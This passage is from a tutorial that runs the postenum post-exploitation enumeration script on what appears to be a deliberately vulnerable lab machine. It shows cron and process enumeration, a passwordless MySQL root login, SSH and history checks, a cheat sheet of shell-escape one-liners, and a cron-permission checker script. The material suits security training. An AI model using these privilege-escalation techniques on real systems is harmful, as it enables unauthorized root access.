348K -rwxr-xr-x 1 root root 343K Apr 9 2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28 2010 /usr/sbin/nmbd
36K -rwxr-xr-x 1 root root 35K Dec 2 2008 /usr/sbin/rpc.idmapd
76K -rwxr-xr-x 1 root root 72K Dec 2 2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28 2010 /usr/sbin/smbd
368K -rwxr-xr-x 1 root root 363K Apr 6 2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec 3 2007 /usr/sbin/xinetd
[x] Display every process running by root on the system:
root 1 0.1 0.6 2844 1696 ? Ss 13:20 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 13:20 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 13:20 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 13:20 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 13:20 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 13:20 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 13:20 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 13:20 0:00 [kblockd/0]
root 44 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpid]
root 45 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpi_notify]
root 88 0.0 0.0 0 0 ? S< 13:20 0:00 [kseriod]
root 125 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
root 126 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
root 127 0.0 0.0 0 0 ? S< 13:20 0:00 [kswapd0]
root 169 0.0 0.0 0 0 ? S< 13:20 0:00 [aio/0]
root 1125 0.0 0.0 0 0 ? S< 13:20 0:00 [ksnapd]
root 1316 0.0 0.0 0 0 ? S< 13:20 0:00 [ata/0]
root 1318 0.0 0.0 0 0 ? S< 13:20 0:00 [ata_aux]
root 1327 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_0]
root 1340 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_1]
root 1345 0.0 0.0 0 0 ? S< 13:20 0:00 [ksuspend_usbd]
root 1353 0.0 0.0 0 0 ? S< 13:20 0:00 [khubd]
root 1771 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_2]
root 2295 0.0 0.0 0 0 ? S< 13:20 0:00 [kjournald]
root 2460 0.0 0.2 2216 652 ? S<s 13:20 0:01 /sbin/udevd --daemon
root 2706 0.0 0.0 0 0 ? S< 13:20 0:00 [kpsmoused]
root 3588 0.0 0.0 0 0 ? S< 13:21 0:00 [kjournald]
root 3743 0.0 0.0 0 0 ? S< 13:21 0:00 [rpciod/0]
root 3758 0.0 0.2 3648 564 ? Ss 13:21 0:00 /usr/sbin/rpc.idmapd
root 3985 0.0 0.1 1716 488 tty4 Ss+ 13:21 0:00 /sbin/getty 38400 tty4
root 3986 0.0 0.1 1716 492 tty5 Ss+ 13:21 0:00 /sbin/getty 38400 tty5
root 3990 0.0 0.1 1716 488 tty2 Ss+ 13:21 0:00 /sbin/getty 38400 tty2
root 3993 0.0 0.1 1716 492 tty3 Ss+ 13:21 0:00 /sbin/getty 38400 tty3
root 3996 0.0 0.1 1716 488 tty6 Ss+ 13:21 0:00 /sbin/getty 38400 tty6
root 4069 0.0 0.2 1872 540 ? S 13:21 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root 4116 0.0 0.3 5312 996 ? Ss 13:21 0:00 /usr/sbin/sshd
root 4193 0.0 0.5 2768 1304 ? S 13:21 0:00 /bin/sh /usr/bin/mysqld_safe
root 4236 0.0 0.2 1700 556 ? S 13:21 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root 4399 0.0 0.0 0 0 ? S 13:21 0:00 [lockd]
root 4400 0.0 0.0 0 0 ? S< 13:21 0:00 [nfsd4]
root 4401 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4402 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4403 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4404 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4405 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4406 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4407 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4408 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4412 0.0 0.1 2424 332 ? Ss 13:21 0:00 /usr/sbin/rpc.mountd
root 4480 0.0 0.6 5412 1728 ? Ss 13:21 0:00 /usr/lib/postfix/master
root 4487 0.0 0.4 5388 1204 ? Ss 13:21 0:00 /usr/sbin/nmbd -D
root 4489 0.0 0.5 7724 1364 ? Ss 13:21 0:00 /usr/sbin/smbd -D
root 4493 0.0 0.3 7724 812 ? S 13:21 0:00 /usr/sbin/smbd -D
root 4508 0.0 0.3 2424 856 ? Ss 13:21 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
root 4570 0.0 0.3 2104 896 ? Ss 13:21 0:00 /usr/sbin/cron
root 4598 0.0 0.1 2052 348 ? Ss 13:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 4599 0.0 0.1 2052 476 ? S 13:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 4619 0.0 1.0 10596 2564 ? Ss 13:21 0:00 /usr/sbin/apache2 -k start
root 4638 0.0 10.3 66344 26472 ? Sl 13:21 0:00 /usr/bin/rmiregistry
root 4642 0.5 1.0 12208 2568 ? Sl 13:21 0:08 ruby /usr/sbin/druby_timeserver.rb
root 4649 0.0 0.1 1716 488 tty1 Ss+ 13:21 0:00 /sbin/getty 38400 tty1
root 4657 0.0 0.9 8540 2372 ? S 13:21 0:01 /usr/bin/unrealircd
root 4659 0.3 4.7 14036 12016 ? S 13:21 0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root 4664 0.0 0.4 2724 1188 ? S 13:21 0:00 /bin/sh /root/.vnc/xstartup
root 4667 0.0 1.0 5936 2572 ? S 13:21 0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 4670 0.3 1.9 8988 5000 ? S 13:21 0:05 fluxbox
root 4704 0.0 0.6 2852 1544 pts/0 Ss+ 13:22 0:00 -bash
[x] Is mysql running by root:
root 4193 0.0 0.5 2768 1304 ? S 13:21 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 4235 0.1 6.6 127560 17036 ? Sl 13:21 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 4236 0.0 0.2 1700 556 ? S 13:21 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
www-data 4969 0.0 0.2 1784 540 pts/1 R+ 13:44 0:00 grep mysql
It looks for cron jobs in the usual places under /etc, including the per-package entries in /etc/cron.d and the hourly, daily, weekly, and monthly directories, and prints the contents of /etc/crontab, the system-wide schedule of commands the administrator has set to run. Note that the "Root's cron jobs" check simply runs crontab -l as the current user, which is why it reports no crontab for www-data; reading another user's crontab takes privileges we don't have yet. Next comes every process on the system, the binaries behind them with their permissions, and then the subset running as root. Several network-facing services are in that subset here (smbd, nmbd, xinetd, unrealircd, rmiregistry, the druby_timeserver.rb script, and the Xtightvnc server), and distccd, while running as daemon, accepts jobs from any address (--allow 0.0.0.0/0). That is exactly the kind of thing to write down: a flaw in any process running as root is a direct path to root. Finally, the MySQL check shows the mysqld_safe wrapper running as root but the mysqld daemon itself running as the mysql user.
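Postenum lists the cron directories and the binaries behind running processes, but leaves the follow-up question to you: does root's scheduler execute anything a low-privileged user can modify? The script below is an added example, not part of Postenum or this article, that parses the /etc/crontab format shown above for the paths it references and reports any file under them that is world-writable. The cron tree it scans is a constructed one built in a scratch directory so it runs offline, and the function names (crontab_paths, world_writable_files, demo_cron_tree) are my own; on the target you'd point crontab_paths at /etc/crontab and each file in /etc/cron.d.

```bash
#!/bin/sh
# Added example, not part of postenum or the original article.
# Postenum lists the cron directories; this asks the follow-up question that
# matters for privilege escalation: will root's scheduler execute a file that
# a low-privileged user can modify? Mode bits are checked with find -perm
# rather than "test -w" so the answer doesn't depend on who runs the script.

# Print the absolute paths referenced by the commands in a system crontab
# ("m h dom mon dow user command", the format of /etc/crontab and
# /etc/cron.d/*). Comments and variable assignments like SHELL= are skipped.
crontab_paths() {
    awk '
        /^[ \t]*#/ { next }                       # comment
        /^[ \t]*$/ { next }                       # blank line
        /^[A-Za-z_][A-Za-z0-9_]*=/ { next }       # SHELL=, PATH=, ...
        {
            for (i = 7; i <= NF; i++)             # field 7 onward is the command
                if ($i ~ /^\/[^\/]/) print $i     # keep absolute paths
        }' "$1" | sort -u
}

# Print every regular file under the given directories (or the given files
# themselves) whose mode grants write access to "other".
world_writable_files() {
    for target in "$@"; do
        if [ -e "$target" ]; then
            find "$target" -type f -perm -002 2>/dev/null
        fi
    done
    return 0
}

# Build a constructed cron tree in a scratch directory: one properly
# protected hourly script and one world-writable daily script. Prints the
# scratch directory so the caller can inspect and remove it.
demo_cron_tree() {
    root=$(mktemp -d)
    mkdir "$root/cron.hourly" "$root/cron.daily"
    printf '#!/bin/sh\necho rotate\n' > "$root/cron.hourly/logrotate"
    printf '#!/bin/sh\necho backup\n' > "$root/cron.daily/backup"
    chmod 755 "$root/cron.hourly/logrotate"
    chmod 777 "$root/cron.daily/backup"        # the misconfiguration
    cat > "$root/crontab" <<EOF
# m h dom mon dow user command
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report $root/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report $root/cron.daily )
EOF
    printf '%s\n' "$root"
}

# Demo. On the target: world_writable_files $(crontab_paths /etc/crontab)
# and the same for each file in /etc/cron.d.
scratch=$(demo_cron_tree)
echo "[*] paths referenced by the crontab:"
crontab_paths "$scratch/crontab"
echo "[*] world-writable files among them:"
world_writable_files $(crontab_paths "$scratch/crontab")
rm -rf "$scratch"
```

It only checks the "other" write bit. On a real engagement also check group-writable files for groups you belong to (see id), and whether the directories themselves are writable, since being able to replace a file is as good as being able to edit it.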
Phase 4: Database Credentials
The next option covers quick credential checks: according to the usage text it looks for credentials in /etc/fstab and tests database access, which on this box means trying to connect to MySQL and log in. Use the -t switch:
target:/var/tmp$ ./postenum.sh -t
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license
Server version 5.0.51a-3ubuntu5
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Uptime: 25 min 31 sec
Threads: 2 Questions: 446 Slow queries: 0 Opens: 420 Flush tables: 1 Open tables: 64 Queries per second avg: 0.291
It connects to the local MySQL service as root with no password, then prints mysqladmin's version, connection, and uptime details. Two things to note: the connection went over the UNIX socket, and whether the same root login is accepted over the network (netstat showed 3306 bound to 0.0.0.0) depends on the host column of the mysql.user table, which we can now read ourselves, along with its password hashes and every application database. And since the mysqld process runs as the mysql user rather than root, any file reads or writes we perform through SQL are limited to that account's permissions.
Phase 5: Development Tools & Shell Escapes
The next option looks for common development tools and interpreters on the system, which are often what makes privilege escalation practical (compiling an exploit, running a script), and for the tools available to move files on and off the box. It also prints a cheat sheet of shell-escape commands for common programs, useful when you land in a restricted shell or find one of those programs running with elevated rights. Use the -l option for this:
target:/var/tmp$ ./postenum.sh -l
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] DEVELOPMENT TOOLS and LANGUAGES
[+] - Check for development tools and languages are installed/supported
/usr/bin/python
/usr/bin/perl
/usr/bin/php
/usr/bin/gcc
/usr/bin/cc
/usr/bin/nmap
[+] - Check for how files can be uploaded
/usr/bin/ftp
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/curl
[+] - Shell escape
awk = awk 'BEGIN {system("/bin/sh")}'
perl = perl -e 'exec "/bin/sh";'
python = python -c 'import pty;pty.spawn("/bin/sh")'
php = php -r 'system("/bin/sh");'
ruby = ruby -e 'exec "/bin/sh"'
less = !sh
more = !sh
man = !sh
nmap = --interactive
nmap = echo "os.execute('/bin/sh')" > /tmp/shell.nse
find = find / -exec /usr/bin/awk 'BEGIN {system("/bin/sh")}' \;
find = find / -exec sh -i \;
vi = :!sh or :shell or -c '!sh'
vim = :!sh or :shell or -c '!sh'
gdb = shell
[+] - List all Environment Variables
SERVER_SIGNATURE=<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
ORIG_PATH_TRANSLATED=/var/www/dvwa/vulnerabilities/exec/index.php
TERM=xterm
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
HTTP_HOST=10.10.0.50
SERVER_PORT=80
REDIRECT_HANDLER=php5-cgi
DOCUMENT_ROOT=/var/www/
SCRIPT_FILENAME=/var/www/dvwa/vulnerabilities/exec/index.php
REQUEST_URI=/dvwa/vulnerabilities/exec/
SCRIPT_NAME=/dvwa/vulnerabilities/exec/index.php
HTTP_CONNECTION=keep-alive
REMOTE_PORT=38016
PATH=/usr/local/bin:/usr/bin:/bin
ORIG_SCRIPT_FILENAME=/usr/lib/cgi-bin/php
SERVER_ADMIN=webmaster@localhost
PWD=/var/tmp
REDIRECT_STATUS=200
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5
HTTP_REFERER=http://10.10.0.50/dvwa/vulnerabilities/exec/
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_DNT=1
ORIG_SCRIPT_NAME=/cgi-bin/php
REMOTE_ADDR=10.10.0.1
SERVER_NAME=10.10.0.50
SHLVL=4
CONTENT_LENGTH=68
SERVER_SOFTWARE=Apache/2.2.8 (Ubuntu) DAV/2
QUERY_STRING=
SERVER_ADDR=10.10.0.50
GATEWAY_INTERFACE=CGI/1.1
HTTP_UPGRADE_INSECURE_REQUESTS=1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
CONTENT_TYPE=application/x-www-form-urlencoded
REDIRECT_URL=/dvwa/vulnerabilities/exec/index.php
HTTP_COOKIE=security=low; PHPSESSID=c7e9261b3015fccc2d7518ea95244d5e
REQUEST_METHOD=POST
ORIG_PATH_INFO=/dvwa/vulnerabilities/exec/index.php
_=/usr/bin/printenv
[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen
We can see that it finds some dev tools and languages, such as Python, PHP, and Nmap, among others. It also checks for tools that can be used to upload files, which could lead to further compromise. Then, it lists some shell escape commands, followed by environment variables and available shells on the system.
Phase 6: Software Versions
The next option we will look at will determine some version information from common software installed on the target. Use the -v switch to do so:
target:/var/tmp$ ./postenum.sh -v
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] SOFTWARES VERSION
[+] - Check apps and services version
[x] Sudo version (<= 1.8.20):
Sudo version 1.6.9p10
[x] MYSQL version:
mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
[x] PostgreSQL version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing
[x] Java version:
java version "1.5.0"
gij (GNU libgcj) version 4.2.4 (Ubuntu 4.2.4-1ubuntu3)
Copyright (C) 2007 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
This gives us the software version numbers for Sudo, MySQL, PostgreSQL, and Java.
Phase 7: Interesting Files
The next option will attempt to locate any interesting files present on the system that could potentially be utilized for privilege escalation. Use the -c switch for this one:
target:/var/tmp$ ./postenum.sh -c
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] CONFIDENTIAL INFO and USER
[+] - Check list of users and super users
[x] Super user:
root:x:0:0:root:/root:/bin/bash
root
[x] Useful home users:
drwxr-xr-x 2 root nogroup 4096 Mar 17 2010 /home/ftp
drwxr-xr-x 5 msfadmin msfadmin 4096 Jun 16 2018 /home/msfadmin
drwxr-xr-x 2 service service 4096 Apr 16 2010 /home/service
drwxr-xr-x 3 user user 4096 May 7 2010 /home/user
[x] Anything with /bin/bash /bin/sh /bin/dash:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
[+] - Check /etc for config files (recursive 1 level)
[x] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr 9 2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov 6 2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26 2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13 2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr 4 2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20 2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16 2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11 2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20 2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16 2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20 2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16 2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 17 2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar 5 2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20 2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20 2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar 8 2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 41 Jul 5 2018 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18 2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28 2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16 2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27 2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28 2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23 2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec 2 2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23 2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16 2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May 4 2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20 2012 /etc/xinetd.conf
[x] Sudo permissions
[/] We can run sudo without supplying a password:
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
{-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...
[+] - Check sensitive files
-rw-r--r-- 1 root root 1581 May 13 2012 /etc/passwd
-rw-r----- 1 root shadow 1207 May 13 2012 /etc/shadow
-rw-r--r-- 1 root root 886 Apr 16 2010 /etc/group
-r--r----- 1 root root 470 Mar 16 2010 /etc/sudoers
[+] - Check if anything interesting in the mail directory
[x] Interesting mail in /var/mail:
-rw------- 1 msfadmin mail 0 Apr 28 2010 msfadmin
-rw------- 1 root mail 722 May 7 2010 root
[x] Seems /var/mail/root exist - you can try to read it:
./postenum.sh: line 792: : command not found
[+] - Check if anything interesting in the home/root directories
[x] Check if /root is accessible:
[/] Root directory can be accessible
drwxr-xr-x 2 root root 4.0K May 20 2012 Desktop
-rwx------ 1 root root 401 May 20 2012 reset_logs.sh
-rw-r--r-- 1 root root 138 Jun 19 13:21 vnc.log
[x] Interesting /home/* directory:
drwxr-xr-x 2 root nogroup 4.0K Mar 17 2010 ftp
drwxr-xr-x 5 msfadmin msfadmin 4.0K Jun 6 2018 msfadmin
drwxr-xr-x 2 service service 4.0K Apr 16 2010 service
drwxr-xr-x 3 user user 4.0K May 7 2010 user
[x] History files of /home/*/:
lrwxrwxrwx 1 root root 9 May 14 2012 /home/msfadmin/.bash_history -> /dev/null
-rw------- 1 root root 4.1K May 14 2012 /home/msfadmin/.mysql_history
-rw------- 1 user user 165 May 7 2010 /home/user/.bash_history
[x] History files of /root:
-rw-r--r-- 1 root root 173 Jun 18 2020 /root/.bash_history
-rw------- 1 root root 215 Jun 18 13:46 /root/.mysql_history
[+] - Check for plain text password
[x] ~/.bash_history - snippet below:
export TERM=xterm-256color
export SHELL=bash
stty rows 56 columns 213
ls
export TERM=xterm
ls
gfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ls
ls -la
cd /tmp/
~/.nano_history file doesn't exist:
~/.mysql_history file doesn't exist
~/.php_history file doesn't exist
[+] - Check SSH Dir/Files
[x] Any private-key info - /home/*/.ssh/:
drwx------ 2 msfadmin msfadmin 4096 May 17 2010 /home/msfadmin/.ssh
drwx------ 2 user user 4096 May 7 2010 /home/user/.ssh
[x] Any private-key info - /root/.ssh/:
drwxr-xr-x 2 root root 4096 May 20 2012 /root/.ssh/
ls: cannot open directory /home/user/.ssh: Permission denied
[READABLE]
Check if PermitRootLogin is on:
[/] Root is allowed to login via SSH
yes
[+] - Check password policy information and Umask value
[x] Password Policy:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
[x] Current umask value:
0022
u=rwx,g=rx,o=rx
[+] - Accessible .rhosts files
[x] Rhost config file(s):
-rwx------ 1 msfadmin msfadmin 4 May 20 2012 /home/msfadmin/.rhosts
First, it gives us a list of superusers and users, followed by anything from /etc/passwd that has a shell. Next, it looks for various configuration files, sensitive files, and what the sudo permissions are like. Note that the sudo result here is a false positive: what follows the "We can run sudo without supplying a password" line is sudo's usage message rather than a list of permitted commands, which means this old sudo build did not recognize the option the script passed to it. It then checks for mail and any other interesting files in the home and root directories; the "command not found" line under the /var/mail/root check is an error in the script itself, so the mail file was not actually read. Lastly, it gives us the Bash history, password policy information, and any private keys for SSH.
Phase 8: Other Files & Sticky Bits
The next option we'll cover will give us SUID and SGID information related to the filesystem. These types of files can often be abused for privilege escalation when misconfigured. It will also check for hidden files and any other useful bits of information. Use the -s switch for this:
target:/var/tmp$ ./postenum.sh -s
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] FILE SYSTEM
[+] - Check if anything interesting in the www directory
[x] Any interesting file/folder in /var:
drwxr-xr-x 2 root root 4.0K May 8 2010 backups
drwxr-xr-x 12 root root 4.0K Apr 28 2010 cache
drwxr-xr-x 37 root root 4.0K May 20 2012 lib
drwxrwsr-x 2 root staff 4.0K Apr 15 2008 local
drwxrwxrwt 3 root root 60 Jun 19 13:21 lock
drwxr-xr-x 14 root root 4.0K Jun 19 13:21 log
drwxrwsr-x 2 root mail 4.0K May 7 2010 mail
drwxr-xr-x 2 root root 4.0K Mar 16 2010 opt
drwxr-xr-x 14 root root 580 Jun 19 13:21 run
drwxr-xr-x 5 root root 4.0K Apr 28 2010 spool
drwxrwxrwt 2 root root 4.0K Jun 19 13:35 tmp
drwxr-xr-x 10 www-data www-data 4.0K Aug 8 2018 www
[x] Any interesting file/folder in /var/www:
drwxrwxrwt 3 root root 4.0K Jun 19 2019 dav
drwxr-xr-x 8 www-data www-data 4.0K May 20 2012 dvwa
-rw-r--r-- 1 www-data www-data 891 May 20 2012 index.php
drwxr-xr-x 10 www-data www-data 4.0K May 14 2012 mutillidae
drwxr-xr-x 11 www-data www-data 4.0K May 14 2012 phpMyAdmin
-rw-r--r-- 1 www-data www-data 19 Apr 16 2010 phpinfo.php
drwxr-xr-x 3 www-data www-data 4.0K May 14 2012 test
drwxrwxr-x 22 www-data www-data 20K Apr 12 2018 tikiwiki
drwxrwxr-x 22 www-data www-data 20K Apr 16 2010 tikiwiki-old
drwxr-xr-x 7 www-data www-data 4.0K Apr 16 2010 twiki
ls: cannot access /var/www/html: No such file or directory
[x] Search on config.* and db.* files on /var:
-rw-r--r-- 1 root root 21424 May 20 2012 /var/cache/debconf/config.dat
-rw-r--r-- 1 root root 21308 May 20 2012 /var/cache/debconf/config.dat-old
